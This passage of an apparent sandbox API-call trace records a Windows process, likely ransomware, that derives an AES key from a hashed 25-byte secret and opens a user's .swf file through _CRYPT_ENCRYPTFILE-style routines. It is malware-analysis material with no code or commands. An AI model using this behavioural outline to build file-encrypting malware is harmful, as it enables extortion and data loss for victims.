dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AcJ9.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.005] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.005] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.006] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0199.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0199.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.006] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.006] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac58d210, ftCreationTime.dwHighDateTime=0x1d5e254, ftLastAccessTime.dwLowDateTime=0x1642dec0, ftLastAccessTime.dwHighDateTime=0x1d5e11d, ftLastWriteTime.dwLowDateTime=0x1642dec0, ftLastWriteTime.dwHighDateTime=0x1d5e11d, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="AcJ9.swf", cAlternateFileName="")) returned 0x90af58 [0199.006] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.007] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.007] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.007] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.007] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.007] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0199.007] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.007] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.007] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.007] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.008] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0199.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.008] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0199.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.009] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0199.009] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.009] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.009] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.009] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0199.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.009] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.009] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.009] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.010] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.010] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.010] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.010] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.010] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0199.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.010] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.011] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.011] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.011] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.011] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.011] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.011] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0199.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.012] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0199.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0199.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.013] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0199.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.013] CryptDestroyHash (hHash=0x90ae18) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.013] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0199.013] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0199.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0199.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\acj9.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0199.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0199.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.020] HeapFree (in: 